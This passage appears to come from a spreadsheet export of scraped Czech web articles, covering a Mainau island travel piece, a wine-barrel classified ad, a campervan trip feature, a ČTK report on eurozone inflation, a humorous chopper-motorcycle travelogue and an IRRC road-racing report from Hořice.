tomu důvod. Pro mimořádně příznivé podmínky jeho mikroklima odpovídá Středomoří. A tak tu bez problémů rostou palmy nebo banánovníky. Po svazích šplhá vinná réva, ale také keře modrých hortenzií. Vrcholové partie ostrova osadily dokonce obrovité mamutí stromy ze severní Ameriky . Aby se oko turistovo nenudilo, zahradní umělci tu vymodelovali vertikální tvary osázené hromadami živých květů. Potkáváme obrovského páva, hejno obřích květinových kachen nebo rozmáchlá křídla motýla. Páv sestavený ze živých květin na ostrově Mainau Vstupné na tento ostrov, který patří švédské královské rodině Bernadotte, je vskutku značně vysoké. Přesto je zaplaven dychtivými turisty. Naštěstí je tu místa dost a na každém rohu objevíte něco zajímavého. Skryté tůňky s vodotrysky a domy duchů, italskou vodní kaskádu, která skoro nemá konce, rozlehlé a nadmíru voňavé rozárium, skvělý palmový skleník a především úžasný dům motýlů. Jeho návštěva zanechává nezapomenutelný zážitek, protože těžkým tropickým vzduchem prolétávají různobarevní motýli. Chytají je tu na nastražené banány a pomeranče, do nichž tento krásný hmyz vpravuje své dlouhé sosáky, aby na nich setrval do plného nasycení. A to je ta chvíle pro nejlepší fotografie. Na samém vrcholu ostrova stojí barokní zámek. Nechali si ho tu i s přilehlou mariánskou kaplí postavit velmistři Řádu německých rytířů pro své potěšení i letní odpočinek. Unikátní podmínky pro založení subtropických zahrad však až v roce 1853 rozpoznal další majitel, vévoda Bedřich z Badenu . Do dokonalosti cenné botanické zahrady ovšem celek rozvinul až švédský princ Lennart od třicátých let minulého století. Vybudoval si zde své trvalé útočiště a zdroj příjmů poté, co se vzdal královských poct po rozvodu a morganatickém sňatku se svou sekretářkou, s níž zplodil nemálo dětí. Naši „husovskou“ pouť tedy uzavíráme poměrně exoticky, ale každopádně optimisticky. V místě, kde nevládne smrt, ale bují život. V tak trochu jiném Německu , nedotčeném bombardováním za druhé světové války a hlavně příjemně hřejivém, až jižansky působivém. A vlastně proloženém švédským podtónem. Přidej svou zkušenost nebo doplň informace Vaše jméno *</t>
  </si>
  <si>
    <t>2040</t>
  </si>
  <si>
    <t>1210</t>
  </si>
  <si>
    <t>20241001_20_2997698405_871eb29b335a48a32faa.html</t>
  </si>
  <si>
    <t>871eb29b335a48a32faa</t>
  </si>
  <si>
    <t>potravinářský sud – plastová nádoba na víno 300l LEVNĚ</t>
  </si>
  <si>
    <t>potravinářský sud – plastová nádoba na víno 300l LEVNĚ 1.10.2024 Infobudisvino@gmail.com Prodám 3ks zánovních, téměř nepoužitých uzavřených plastových nádob na víno . S víkem a ventilem, samostatně stojící. Rozměry 87x87x57cm. Původní cena 3tis., viz faktura. Cena 1000Kč kus Místo odběru Mutěnice . Tel. 777689728 Autor: Budisvino</t>
  </si>
  <si>
    <t>2550</t>
  </si>
  <si>
    <t>667000</t>
  </si>
  <si>
    <t>20241001_21_2998024817_52cfc3c7a8e9177415dc.html</t>
  </si>
  <si>
    <t>52cfc3c7a8e9177415dc</t>
  </si>
  <si>
    <t>Objevte kouzlo českých víkendových cest v obytném autě</t>
  </si>
  <si>
    <t>Objevte kouzlo českých víkendových cest v obytném autě 01.10.2024 Redakce V dnešní uspěchané době se mnozí z nás snaží uniknout každodennímu shonu a najít si chvíli pro odpočinek a relaxaci. Pro karavanisty, majitele obytných aut a camper turisty se víkendové výlety staly promenádou ve volnosti a nezávislosti. V tomto článku se ponoříme do fascinujícího světa českých víkendových tras, které nabízejí nejen krásné přírodní scenérie, ale i zajímavé historické památky. Krásy Českého ráje Jednou z nejvýznamnějších oblastí, kterou by si každý karavanista měl zahrnout do svých plánů, je Český ráj. Tento region, proslulý svými skalními městy, nabízí úchvatné trasy pro pěší turistiku i cyklistiku. Zajímavým faktem je, že Český ráj byl prvním geoparkem UNESCO v České republice . Časté zastávky na místech jako Hrubá Skála nebo Prachovské skály umožňují obdivování nejen přírodních útvarů, ale také romantického hradu Trosky, který se tyčí nad malebnými krajinami. Pro karavanisty je zde spousta kempů, které nabízejí pohodlné zázemí a jedinečné výhledy. Historie a kultura ve Frýdlantě Další fascinující destinací je městek Frýdlant , který se nachází na severu Čech . Historické jádro s impozantním frýdlantským zámkem a kostelem svatého Petra a Pavla přitahuje jak kulturní nadšence, tak i milovníky přírody. Zámek, datovaný do 13. století, se pyšní bohatou historií a láká návštěvníky k prohlídkám jeho interiérů. Karavanisté zde mohou nalézt příjemné kempovací místa v okolí, což činí Frýdlant ideálním výchozím bodem pro objevování nejbližšího okolí, například přírodní rezervace bezprostředně sousedící s Českým Švýcarskem . Podzimní dobrodružství v Pálavě Pokud se chystáte na výlet na podzim, region Pálavy s typickými vinicemi a malebnými kopci je ideální volbou. Toto místo je známé nejen svými víny, ale také početnými cyklostezkami a turistickými trasami, které podávají úchvatné výhledy na Mikulov a okolní krajinu. Zajímavostí je jak místní hrozny, tak tradice svatomartinského burčáku, který na podzim každoročně láká davy milovníků vína . Pro karavanisty zde existují dobře vybavené kempy, které poskytují příjemné zázemí pro odpočinek po náročných výletech. Navíc, víkendová dobrodružství v obytném autě nejsou pouze o přírodě. Ti, kteří zvolí trasy kolem měst jako Praha nebo Brno , mají možnost spojit relaxaci s kulturními zážitky. Mnoho karavanistů objevuje skryté poklady v podobě malých galerií, tradičních trhů nebo řemeslných dílen, kde je možné zakoupit jedinečné suvenýry. Možnost svobodného rozhodování o programových bodech je jedním z největších přínosů cestování v obytném autě. Když se tedy chystáte na další víkendový výlet, pamatujte, že Česká republika skrývá mnohá nezapomenutelná místa, která čekají na vaši návštěvu. Cesta v obytném autě vám umožní nejen prozkoumávat, ale také se vcítit do prostředí, které máte na dosah ruky. Tímto způsobem se stává každé dobrodružství jedinečnou zkušeností, která obohatí vaše zážitky a vzpomínky na cesty. Autor: Redakce</t>
  </si>
  <si>
    <t>29</t>
  </si>
  <si>
    <t>21</t>
  </si>
  <si>
    <t>20241001_22_2999353873_538460031d644ee12760.html</t>
  </si>
  <si>
    <t>538460031d644ee12760</t>
  </si>
  <si>
    <t>Inflace v eurozóně poprvé za více než tři roky klesla pod dvouprocentní cíl ECB</t>
  </si>
  <si>
    <t>Inflace v eurozóně poprvé za více než tři roky klesla pod dvouprocentní cíl ECB Meziroční růst spotřebitelských cen v eurozóně v září zpomalil na 1,8 procenta ze srpnového tempa 2,2 procenta. Inflace se tak poprvé od poloviny roku 2021 dostala pod dvouprocentní cíl Evropské centrální banky (ECB). Vyplývá to z rychlého odhadu , který dnes zveřejnil evropský statistický úřad Eurostat. Údaje za celou Evropskou unii odhad neobsahuje, nejsou v něm tedy ani data za Českou republiku . Dnešní údaje podporují vyhlídky na to, že ECB v říjnu přikročí k dalšímu snížení úrokových sazeb. Za zářijovým zpomalením inflace stály zejména ceny energií, které se meziročně snížily o šest procent po srpnovém tříprocentním poklesu. Meziroční míra takzvané jádrové inflace, která nezahrnuje ceny energií, potravin, alkoholu a tabáku, v září klesla na 2,7 procenta z 2,8 procenta v předchozím měsíci. Nejvyšší inflaci v rámci eurozóny vykázala v září Belgie , kde se spotřebitelské ceny meziročně zvýšily o 4,5 procenta. Nejnižší byla inflace naopak v Irsku , kde ceny vzrostly pouze o 0,2 procenta. ECB už v červnu v reakci na zpomalování inflace zahájila snižování úrokových sazeb, aby tak podpořila hospodářský růst v eurozóně. Svou depozitní sazbu snížila o čtvrt procentního bodu na 3,75 procenta. Tento měsíc sazbu zredukovala o další čtvrtinu procentního bodu na 3,50 procenta. Předloni v červenci ECB zahájila zvyšování úrokových sazeb s cílem dostat inflaci v eurozóně pod kontrolu, loni v říjnu nicméně zvyšování úroků přerušila. Do letošního června pak držela úroky beze změny. Šéfka ECB Christine Lagardeová v pondělí v Evropském parlamentu řekla, že díky nejnovějšímu vývoji sílí přesvědčení, že "inflace se včas vrátí k cíli". "Zohledníme to v říjnu na našem příštím zasedání," dodala. ECB v září předpověděla, že inflace v eurozóně za celý letošní rok dosáhne 2,5 procenta. V příštím roce banka počítá se zpomalením inflace na 2,2 procenta a v dalším roce na 1,9 procenta. Finanční trhy se nyní podle agentury Reuters domnívají, že pravděpodobnost snížení úroků na říjnovém zasedání ECB činí 85 procent. Začátkem minulého týdne přitom tuto pravděpodobnost odhadovaly pouze na 25 procent. "Protože hospodářský růst zůstává pod tlakem, zdá se, že ECB má otevřené dveře k rychlejšímu postupu (při snižování úrokových sazeb)," uvedl ekonom Bert Colijn ze společnosti ING. "Do hry se tak dostává říjnové zasedání," dodal. V České republice spotřebitelské ceny v srpnu meziročně vzrostly o 2,2 procenta, což bylo stejným tempem jako v červenci. Údaje o zářijovém vývoji inflace zveřejní Český statistický úřad ( ČSÚ ) příští týden ve čtvrtek. Česká národní banka ( ČNB ) minulý týden snížila základní úrokovou sazbu o čtvrt procentního bodu na 4,25 procenta, nejníže od začátku února 2022. Uvolňování měnové politiky zahájila ČNB loni v prosinci, kdy v prvním kroku snížila základní úrokovou sazbu o čtvrt procentního bodu na 6,75 procenta. Roční míra inflace v zemích EU - v procentech podle harmonizovaného indexu spotřebitelských cen září 2023 duben 2024 květen 2024 červen 2024 červenec 2024 srpen 2024 září 2024* Eurozóna 4,3 2,4 2,6 2,5 2,6 2,2 1,8 Belgie 0,7 4,9 5,4 4,3 4,5 Estonsko 3,9 3,1 2,8 3,5 3,4 3,2 Finsko 3,0 0,6 0,4 0,5 1,1 0,8 Francie 5,7 2,4 2,6 2,5 2,7 2,2 1,5 Chorvatsko 7,4 4,7 4,3 3,5 3,3 3,0 Irsko 5,0 1,6 2,0 1,5 1,1 0,2 Itálie 5,6 0,9 0,8 0,9 1,6 1,2 0,8 Kypr 4,3 2,1 3,0 2,4 2,2 1,9 Litva 4,1 0,4 0,9 1,0 1,1 0,8 0,4 Lotyšsko 3,6 1,0 0,0 1,5 0,8 0,9 1,6 Lucembursko 3,4 3,0 3,2 2,8 2,7 1,7 0,8 Malta 4,9 2,4 2,3 2,2 2,3 2,4 2,1 Německo 4,3 2,4 2,8 2,5 2,6 2,0 1,8 Nizozemsko -0,3 2,6 2,7 3,4 3,5 3,3 Portugalsko 4,8 2,3 3,8 3,1 2,7 1,8 2,6 Rakousko 5,8 3,4 3,3 3,1 2,9 2,4 1,8 Řecko 3,5 3,4 3,2 2,4 2,5 3,0 3,1 Slovensko 9,0 2,4 2,6 2,4 3,0 3,2 2,9 Slovinsko 7,1 3,0 2,5 1,6 1,4 1,1 0,7 Španělsko 3,3 3,4 3,8 3,6 2,9 2,4 1,7 * odhad Zdroj: Eurostat Autor: ČTK Autor ČTK Rubrika transition_slide Byznys</t>
  </si>
  <si>
    <t>353</t>
  </si>
  <si>
    <t>408</t>
  </si>
  <si>
    <t>20241001_23_2997670370_bff6ae1bbc31ea6ac482.html</t>
  </si>
  <si>
    <t>bff6ae1bbc31ea6ac482</t>
  </si>
  <si>
    <t>easy rider</t>
  </si>
  <si>
    <t>easy rider Rubrika: CESTOPIS ZPOCENÁ 500 Můžou motorky, který stojí míň než mobil, zprostředkovat svým pilotů tům příjemný zážitky? Rozhodli jsme jsme se se to to zjistit, abyste vy vy nemuseli. ČÁST 1. Pokud Motohouse pravidelně sledujete, určitě o naší akci Zpocená 500 už víte. Vloni jsme si vymysleli takovou legrácku, že nakoupíme levný japonský motorky s kapotou a vyrazíme na trip po republice. V tu dobu jsme ale vůbec netušili, jak populární se tahle akce stane, takže bylo jasný, že u jednoho ročníku logicky nemůže zůstat. Letos jsme to chtěli ale poslat víc do stylu, takže jsme neměli jinou možnost – pořídíme zpocený čopry! A ne jen tak ledajaký. Podle pravidel to musí bejt tak trochu krám, s nefunkčním podvozkem, ideálně na starejch gumách s nulovou přilnavostí. A to se nám taky povedlo. Když jsme je vyrovnali vedle sebe, ten pohled bral dech. Impozantní, grandiózní, majestátní. Motorkama to ale nekončilo. Jízda na čopru má svoje specifikace a zároveň i zákonitosti. Nemůžete na něj jen tak ledabyle sednout, aniž byste se pořádně vohákli. Takže jsme vyrabovali Bonmoto (sem letí naše první poděkování) a pořádně se vybavili. Vesty, bezprstový rukavice, šátky, kapsičky na stehna, gatě, košile a helmy. Před jízdou jsme namontovali interkomy U COM 8R od Interphone (moc děkujeme, Dušane), protože bez toho, abychom po sobě mohli neustále hulákat, by to byla poloviční zábava. A slyšet Romana každou půlhodinu, jak zoufale hlásí potupnou informaci „borci, zase mi to vaří“, je něco, o co jsme prostě přijít nechtěli. A aby to byl vskutku velkolepej start, nešlo to jinak než pod světly na cílovce brněnského okruhu. Náš epickej odpich a čestný kolečko se nakonec ukázaly jako víc než poetický, protože pár hodin po našem odjezdu se podepsala smlouva o pětiletým pořádání MotoGP právě na Masecu. Náhoda? Nemyslím si… V tuhle chvíli je asi potřeba lehce představit naše stroje. Vzal jsem to zodpovědně, takže po prvním nepochopitelným pobláznění jednou odpornou čínskou dvackou jménem Yamasaki jsem sáhnul po japonský kvalitě v podobě čtyřipade Kawasaki z roku 1986 v origo stavu bez napadení nějakým garážovým kutilem. Stára si nedal říct a dovezl téměř novou Yuki Darker 400, což je z hlediska designu celkem zdařilá kopie Viraga 535, kterýho na úplně nejvíc nejposlednější chvíli pořídil Luky. Kanec odvážně sáhl po brutální stavbě z Hondy Shadow, která měla přední kolo v jiným časovým pásmu a tak nabrblaný laufy, že mu už po minutě jízdy tekla krev z uší. Ondra šel cestou maličký jednoválcový Suzuki Savage 650, kterou jsme mu všichni tajně záviděli. Plameny by totiž chtěl mít na motorce každej, dokonce i ty, už si to konečně přiznej! Rastafariánská deka to pak dorazila – nejvíc Odpadlík. Roman po dlouhým vybírání skončil u jediný možný varianty, protože vzhledem k tomu, že rád sám sebe trápí a jeho zaslepená láska k italským vozům, zejména pak Alfám, je veřejně známá, nemohlo to skončit jinak než naprosto odporným bastardem CFMOTO V3. Už dlouhou dobu razím názor, že je to nejhorší motorka na světě, a taky že jo. Na tom stroji je dobrá jen jedna jediná věc – má magneťák. Opravdovej magič. Sen. Speciální Adam Peschel s námi letos jet nemohl, protože si dával do kupy dojebaný rameno, který na Dakaru bude asi dost potřebovat. Bráško, buď silnej. Příští rok jedeš zase s náma! Sliby, chyby Plán byl víceméně jasnej. Pojedeme někam na jih, u Budějic vezmeme ostrou pravou a přes Prahu to napálíme do Harrachova , kde probíhá Honda Fest a tohle setkání bude cílem naší velkolepý výpravy. Jako zodpovědní bikeři jsme si několikrát nahlas slíbili, že nebudeme dělat žádný kraviny (floky zadním kolem se nepočítají) a pojedeme hezky spořádaně. Jak asi tušíte, vydrželo nám to přesně ke stopce u okruhu, kde to každej z nás nakrmil, na co si sám troufnul, a vyrazilo se směr Dukovany. Pohled do zrcátka byl skutečně impozantní. Šest vznešených strojů naplno zabírajících silnici se řítilo ohromující rychlostí okolo osmdesáti, protože jen pár z nás se odvážilo pokoušet svoje štěstí ve větším kalupu. Jestli jste někdy jeli na třicet let starým čopru, budete vědět, že tady končí veškerá sranda. Oni ti chrchláci i docela jedou, ale projet s nima zatáčku vyžaduje ohromný odhodlání, schopnosti a po ránu minimálně dvě pilulky statečnosti. Dvacet let starý gumy a přední brzdy, který jsou vyloženě k smíchu, našemu tempu taky moc nepřidaly. Takže hezky langsam, piánko. To mě vlastně dostalo nejvíc – jak pomalu naše cesta ubíhala. Jet na Multistradách nebo něčem podobně překoňovaným, byli bychom na jihu asi za hodinu. Tady nám jízda do Jindřichova Hradce trvala celý odpoledne. A to bylo právě krásný. Nikam jsme nespěchali, ubytko přece seženeme těsně před tím, než spadne tma. Jo, další super věc na starých motorkách – nesvítí. Světla na moderních strojích stojí za prd, ale tady se vůbec nedá mluvit o tom, že by nějak účinně osvítily cestu. Nic, nula, na to taky bacha. &amp;gt;&amp;gt; Prvních sto kiláků s námi jela jedna R1, kterou kočíroval táta s dcerou, kteří si náš start prostě nemohli nechat ujít. Takže díkes, že jste s námi ten kousek jeli. Už od začátku jsem si všiml podivně klidný jízdy Lukyho na matce všech čoprů – mocné Virážce 535. Neustále se držel na poslední pozici v naší šípový formaci a bylo jen otázkou času, kdy to naplno otevře a ukáže nám, že mu to jede nejlíp. A ta chvíle přišla na jedný krásný rovince nedaleko Kunžaku , kdy nás všechny do jednoho za doprovodu maniakálního smíchu vysmrděl. Celkem jsem si na něj věřil, ale neměl jsem Kawu zrovna vymotanou v tom nejšťavnatějším pásmu, takže jsem byl nucenej potupně rezignovat a uznat hanebnou porážku. Kancovi jela Shadow taky hodně slušně, ale kvůli doprasený geometrii vlivem předního kola asi čtyři a půl metru před chladičem si na nějaký závodění netroufl. Pro něj byla výhrou každá projetá zatáčka, ve který se strašlivě nerozbil buď o svodidla, nebo o Scanii v protisměru. Ondra se vezl na vlně velmi krátkýho závanu točáku jeho jednoválce z endura a Stára už dávno rezignoval na řazení vinou nespolupracující skříně jeho Yukiny, ze který pravidelně vyskakovala dvojka, takže jel všechno na čtyřku nebo pětku. Do týhle chvíle totiž ještě nezjistil, kolik kvaltů ve svý převodovce skutečně má. A už to asi nikdy nezjistí. O tom ale až později. Rána osudu Bylo to vlastně nevyhnutelný a spíš jsme jen čekali, kdy se to stane. Romanova Fau Dráj (CFMOTO V3) se poprvé zesrala hned první den, kdy její vodní pumpa začala trpět velmi silnou inkontinencí a samovolně po cestě chlejstala vařící chladičku na okolní motorky (dík vole). Bylo jasný, že taková situace bude vyžadovat řešení, takže jsme nakoupili zásobu vody a jenom čekali na zoufalou zprávu do interkomů, že budeme zase stavět, protože opět musí dolívat. Sice nám ho bylo trochu líto, ale stejně jsme se museli smát, zbytek motorek totiž fungoval bezvadně. Zatím. Chtěli jsme zakempit někde kolem vody v Táboře , ale když jsme viděli ty lačný pohledy místních domorodců, bylo nám jasný, že do rána by naše motorky skončily buď ve sběru, nebo v plamenech a my minimálně s rozbitou držkou nebo v horším případě s čůrem nasoleným pod žebra. Takže jsme náš původní plán statečně opustili a přesunuli se do mnohem klidnějšího Sezimova Ústí , kde jsme našli fantastickej penzion s parkováním pro naše vznešený stroje. Napráskli jsme si pupky, dali pár plzní v rychlým sledu a začali vymýšlet, kde tu dojebanou V3 opravíme. Chtělo to minimálně vycuknout nefunkční termostat a svařit upadlej držák SPZ na Kancovo stavbě. Ale to není zdaleka všechno, protože nastal čas povýšit naši srandovní akci na něco trochu vznešenějšího… Více se dozvíte příště a radím vám dobře, nenechte si to ujít! // pokračování příště Lukáš 1993 Yamaha Virago 535 Special Edition Výkon: 45 koní | najeto: 46 387 km | hmotnost: 182 kg | max. rychlost: 148 km/h | pořizovací cena: 25 000 Kč + replika válečné pistole | spotřeba benzinu: 4 l/100 km | silné stránky: akcelerace, pohodlí na delší trasy, spotřeba | slabé stránky: málo místa pro jízdu s Kancem, nebrzdí to, ale jakože vůbec | výbava: předkopy, zadní držák brašen, chrom hefty made by AliExpress Carlos 1986 Kawasaki EN 450 lTD Výkon: 50 koní | najeto: na budíku 33 634 km (dotažená z Německa , takže spíš tak sto…) | hmotnost: 201 kg | max. rychlost: z kopce šla 153 km/h a ještě chtěla | pořizovací cena: 25 000 Kč | spotřeba benzinu: 3,8 l/100 km | silné stránky: točivý závodní motor, pohodlí, jako jediná jela skutečně po zadním | slabé stránky: úzký řídítka, vytelenej hlavní stojan (doleva nejde zatočit), tragická přední brzda | výbava: třásně, držák piva , pivo , hnusný brašny, tempomat (opěrka), Peak Design držák mobilu Roman 2007 CFMOTO V3 Výkon: 13 koní | najeto: 3268 km | hmotnost: 164 kg | max. rychlost: když to dobře foukne, tak 110 km/h | pořizovací cena: 26 000 Kč (v inzerátu bylo 28, ale prodejce mu vnutil dva tisíce zpátky) | spotřeba benzinu: 5 l/100 km | silné stránky: kazeťák, kazeťák, kazeťák | slabé stránky: nejhnusnější motorka na světě, tragická jízdní pozice, tekoucí vodní pumpa | výbava: slidery na plotnách, korálky na sedle, navigační věž, vysokopevnostní nosič, bič, kapotáže nýtované z leteckého hliníku, gigantický (nefunkční) plexi Ondra 1996 Suzuki lS650 Savage Výkon: 38 koní (tenkrát) | najeto: 38 800 km | hmotnost: 171 kg | max. rychlost: 110 km/h (z kopce) | pořizovací cena: 30 000 Kč | spotřeba benzinu: 5 l/100 km | silné stránky: pohodlí, ovladatelnost, styl | slabé stránky: výkon, baterka, menší velikost | výbava: všude plameny, orlice na blatníku, nosič, brašny, předkopy, 12V zásuvka, Peak Design držák mobilu Honza 2009 Yuki Darker 400 Výkon: 30 koní | najeto: 6430 km | hmotnost: 194 kg | max. rychlost: 140 km/h, jednou | pořizovací cena: 27 000 Kč | spotřeba benzinu: 4 l/100 km | spotřeba elektřiny: všechna | silné stránky: pohodlí, vzhled, motor | slabé stránky: Čína , převodovka, elektrika | výbava: skull samolepky, brašny jak hajzl, laufy, co neprojdou technickou, kožka z kozy, Peak Design držák mobilu Luky „Kanec“ 1994 Honda VT 600 Shadow Výkon: 43 koní | najeto: asi 32 000 km, nikdo to přesně neví | hmotnost: 212 kg | max. rychlost: asi 140 km/h, ale víc než 110 jsme se báli | pořizovací cena: 26 000 Kč | spotřeba benzinu: strašná | silné stránky: neskutečný design, originalita, zvuk! | slabé stránky: ovladatelnost, pohodlí, Stárek | výbava: tempomat, gelové sedlo, laďáky à la lešenářská trubka, nálepky, předkopnutý kolo CFMOTO V3, co si myslí, že je BMW . Druhý takový natuty nenajdeš, a jestli jo, rovnou volej Romanovi! Bez pochcaný vesty by to nebylo opravdový. A teď toho jak se patří lituju, protože mám ramena spálený dodnes. Ondra se nám zhlídnul v Odpadlíkovi. Samolepka přidává minimálně pět koní navíc, což teda potřeboval. Fontána pre Zuzanu nemohla chybět To je tak, když dáte čopra do ruky stuntriderovi z Ostravy . Styl level milion! jízda na čopru má svoje specifika a zároveň i zákonitosti Držáky všude. Některý fakt potřebný, jiný o kousek míň. Koho zajímá, že kvůli flašce nešlo zatáčet doleva? Kdo by taky chtěl jezdit doleva, že jo. Každej den bez nehody se musel řádně oslavit, protože bylo fakticky co! Každej vyjadřuje radost z pohybu jinak. Ondra takhle. Dát tam punčochu, aspoň by byla kam strčit noha. Ale byla by to srabárna, tak jsme ho tam nechali. Luky a jeho nejrychlejší a taky neprůstřelně kvalitní Virago Takového uvítání se nám dostávalo prakticky všude. Holky z nás byly naruby, to je snad jasný. Čopr nečopr, na zadní musel tak jako tak. Mrkejte na ty koně! lidi dokážou vymyslet tolik rozličných způsobů, jak se trápit Autor: text: Karel Táborský, foto: Jan Stárek, Karel Horák (Okruháři.cz), autor Autor person Karel Táborský Rubrika transition_slide CESTOPIS ZPOCENÁ 500</t>
  </si>
  <si>
    <t>18000</t>
  </si>
  <si>
    <t>20241001_24_2997627067_31a166652795755d2eea.html</t>
  </si>
  <si>
    <t>31a166652795755d2eea</t>
  </si>
  <si>
    <t>ČESKÁ TT V HOŘICÍCH UŽ 10 LET VČETNĚ IRRC</t>
  </si>
  <si>
    <t>ČESKÁ TT V HOŘICÍCH UŽ 10 LET VČETNĚ IRRC Rubrika: SPORT ČESKÁ TOURIST TROPHY 2024 Evropský roadracingový šampionát IRRC předvedl na trati v Hořicích v Podkrkonoší obrovskou vyrovnanost a kvality. K vidění byly nové úžasné rekordy, ale také neúprosné boje o letošní tituly. Stálo za to být u toho! Je to 10 let, co do Hořic poprvé zavítal mezinárodní roadracingový šampionát IRRC a závodům v Hořicích to obecně velmi pomohlo. Zejména jsme za těch 10 let viděli hodně kvalitních závodníků a letos tomu nebylo jinak. K tomu se přidalo skvělé počasí a taky hned několik rekordů na naší nejhezčí přírodní trati. Superbike Největší příběh napsal opět David Datzer z Německa . Oba závody své třídy vyhrál a bodově si v šampionátu výrazně polepšil. Navíc zajel znovu traťový rekord s hodnotou 2:12,041. A to v tréninku jel dokonce pod 2:12. Takže se snad můžeme brzo těšit na další vylepšení. Skvěle jel i vítěz Macau GP Erno Kostamo. Fin byl trochu ve stínu Datzera, ale i on jel časy pod traťovým rekordem a dojel dvakrát druhý. Asi ne úplně v dobrém bude na Hořice vzpomínat Belgičan Côme Geenen. Byl v Hořicích nováčkem, ale hlavně hájil celkem slušné vedení v šampionátu IRRC před Datzerem a Maurerem. Bylo celkem jasné, že jako nováček nějaké ty body ztratí, ale při pohledu do tabulky bylo zřejmé, že náskok měl poměrně slušný. Už v kvalifikaci navíc ukázal, že je připraven ztráty minimalizovat. Kvalifikoval se třetím nejlepším časem! V prvním závodě si navíc vedl skvěle a vypadalo to dokonce i na umístění. Dokonce zajel nováčkovský rekord 2:14,085. Rychleji Hořice napoprvé nikdo nikdy nejel! Bohužel v závěru prvního závodu přišel Geenenův vážný pád na Dachovech a transport vrtulníkem. Šance na titul je pryč, ale hlavní je, že to nedopadlo hůře než nemocnicí. Čechům se v litrech nedařilo. Kamil Holán má následky po pádu z května, bohužel také z hořické trati. Kvalifikace nedopadla podle Kamilových představ a do nedělních závodů nenastoupil. Karla Peška potkaly technické potíže, a tak nejlepším Čechem byl trochu překvapivě Aleš Sýkora, který zaznamenal 11. a 12. místo. Supersport V supersportech byla situace snad ještě dramatičtější a dařilo se i Čechům. Nejvíce Petru Najmanovi, který nemá v IRRC dobrou sezonu, ale Hořice mu letos jdou. Oba závody celkem s přehledem ovládl a přidal tak další dvě vítězství v Hořicích a jenom za letošek má čtyři. K tomu 50 bodů do šampionátu, které ho vrací do hry alespoň o top 5. V letošní sezoně vlivem technických problémů totiž Najman neposbíral zdaleka tolik bodů, kolik asi chtěl. Marek Červený jel do Hořic jako leader šampionátu, a jestli měl někde udělat rozhodující náskok na dotírajícího Adama McLeana, tak právě na domácí trati. V prvním závodě to vyšlo. Marek vybojoval druhé místo, McLean byl třetí, a tím pádem přišlo zvýšení náskoku o čtyři body. I když se asi čekalo, že McLean nepojede jako nováček hned na bednu, v průběhu závodu to naopak vypadalo, že by nemusel být „až“ třetí. V druhém závodě ale Marka zradila technika hned v úvodu. Bez řadičky se pokračovat nedalo. McLean navíc dojel druhý a 20 bodů mu pomohlo dostat se před Červeného v celkovém pořadí. Marek Červený má tak v Hořicích nejhorší rok za hodně dlouhou dobu. Nedokončil letos tři závody ze čtyř. Naděje před posledním závodem ve Frohburgu ale pořád žije. Ztrácí na McLeana jen tři body, a i když je McLean favoritem, ve Frohburgu už se zamotal nejeden ročník IRRC. Před výkonem Adama McLeana ze Severního Irska je ale třeba smeknout. Další rychlý nováček. Každým vyjetím na trať časy na kolo padaly a nejlepší hodnotu zaznamenal 2:16,220. Čas, se kterým se v Hořicích léta s přehledem vyhrávalo. Jenže teď stanovil nové maximum třídy Petr Najman na 2:15,636. Supersporty jsou tak teď v Hořicích rychlejší než Superbiky osm let zpět. Verdikt Letošní IRRC v Hořicích bylo plné rekordů a skvělých výkonů. Po sportovní stránce srpnový závodní víkend přerostl tradiční květnové Zatáčky. O důvod víc jezdit do Hořic dvakrát za rok. VÝSLEDKY IRRC Superbike Hořice I. závod 1) David Datzer (GER) BMW 2) Erno Kostamo ( FIN ) BMW + 4,891 3) Lukas Maurer (CH) Yamaha + 16,808 4) Didier Grams (GER) BMW + 25,361 5) Luca Gottardi (ITA) BMW + 29,130 IRRC Superbike Hořice II. závod 1) David Datzer (GER) BMW 2) Erno Kostamo ( FIN ) BMW + 3,078 3) Lukas Maurer (CH) Yamaha + 12,925 4) Didier Grams (GER) BMW + 27,343 5) Johannes Schwimmbeck (GER) BMW + 29,130 Celkové pořadí IRRC Superbike po závodech v Hořicích 1) David Datzer 199 bodů 2) Lukas Maurer 194 b. 3) Côme Geenen 192 b. IRRC Supersport Hořice I. závod 1) Petr Najman (CZE) Yamaha 2) Marek Červený ( CZE ) Triumph + 12,953 3) Adam McLean (GBR) Yamaha + 25,602 4) Ilja Caljouw (NED) Yamaha + 28,936 5) Gary Johnson (GBR) Suzuki + 29,390 IRRC Supersport Hořice II. závod 1) Petr Najman (CZE) Yamaha 2) Adam McLean (GBR) Yamaha + 2,657 3) Ilja Caljouw (NED) Yamaha + 21,818 4) Karel Brandtner (CZE) Yamaha + 21,939 5) Gary Johnson (GBR) Suzuki + 24,554 Celkové pořadí IRRC Supersport po závodech v Hořicích 1) Adam McLean 186 bodů 2) Marek Červený 183 b. 3) Ilja Caljouw 135 b. Start supersportů se dvěma Čechy v první řadě Čtyři vítězství v Hořicích v jedné sezoně? To pivo si Petr Najman rozhodně zaslouží! Erno Kostamo z Finska závodit ve městě umí. Při Macau GP zvítězil, ale v Hořicích na Datzera nestačil. David Datzer na startovním roštu připraven znovu posouvat rekordy Belgičan Côme Geenen si na Hořice zvykl velmi rychle Didier Grams své fanoušky nezanedbává Dominanci, jakou předvádí David Datzer v nejsilnější kubatuře, Hořice nepamatují Vítězný tým Petra Najmana Brit Adam McLean a jeho první závodní kolo v Hořicích . Do města přivezl supersporty jako první. Trofeje z Hořic budou u Davida Datzera doma potřebovat samostatnou poličku Marek Červený ve svém přirozeném prostředí. Doma v Hořicích . Petr Najman moc šampaňského týmu nenechal Nový traťový rekord má neuvěřitelnou hodnotu 2:12,041!!! Autor: text i foto: Milan Kubín Autor person Milan Kubín Rubrika transition_slide SPORT ČESKÁ TOURIST TROPHY 2024</t>
  </si>
  <si>
    <t>20241001_25_2997615749_1676fb32dfb04db2746e.html</t>
  </si>
  <si>
    <t>1676fb32dfb04db2746e</t>
  </si>
  <si>
    <t>Naprosto pohodová extrémní motorka</t>
  </si>
  <si>
